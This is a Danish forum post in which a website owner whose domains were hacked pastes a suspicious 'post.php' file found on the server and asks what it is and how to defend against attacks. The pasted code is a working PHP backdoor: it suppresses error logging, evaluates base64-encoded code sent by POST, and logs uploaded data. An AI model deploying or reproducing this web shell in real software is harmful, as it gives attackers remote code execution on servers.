Jeg har tidligere i år oplevet at ét af mine domæner var blevet hacket.
Det var en hjemmeside som faktisk var mere eller mindre tom, da den "kun" virkede som "henvisningsside".
Løsningen var jo derfor enkel, alt blev slettet, FTP password osv. skiftet og problemer var løst.
Måske!
For i dag har jeg fået besked om at noget kunne tyde på at der alligevel ikke blev renset helt ud g at det måske er mere end et enkelt domæne som er påvirket.
Øv. Så er der jo ikke andet at gøre end at få det hele gået igennem endnu engang.
Jeg har fundet en fil som hedder "post.php". Denne er IKKE en som jeg selv har uploadet og eg aner ikke hvor den kommer fra, så jeg har selvfølgelig slettet den fra serveren. Fandt den under hvert af de domæner som mistænkes at være "ramt".
Er der nogen der kan se ud fra koden, hvad det er for en type?
<?php
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
@ini_set("memory_limit", "128M");
@ini_set("max_execution_time",30);
@set_time_limit(30);
if (isset($_SERVER["HTTP_X_REAL_IP"])) $_SERVER["REMOTE_ADDR"] = $_SERVER["HTTP_X_REAL_IP"];
if (isset($_POST["code"]))
{
eval(base64_decode($_POST["code"]));
}
elseif (isset($_SERVER["HTTP_CONTENT_ENCODING"]) && $_SERVER["HTTP_CONTENT_ENCODING"] == "binary")
{
$input = file_get_contents("php://input");
if (strlen($input) > 0) print "STATUS-IMPORT-OK";
if (strlen($input) > 10)
{
$fp = @fopen(str_replace(".php",".bin",basename($_SERVER["SCRIPT_FILENAME"])), "a");
@flock($fp, LOCK_EX);
@fputs($fp, $_SERVER["REMOTE_ADDR"]."\t".base64_encode($input)."\r\n");
@flock($fp, LOCK_UN);
@fclose($fp);
}
}
elseif (strpos($_SERVER["REQUEST_URI"], ".shtml") !== false)
{
print $_SERVER["REQUEST_URI"];
}
exit;
?>Og er der ellers nogen som kunne have nogle god forslag til hvordan man sikre sig bedst muligt mod at blive hacket?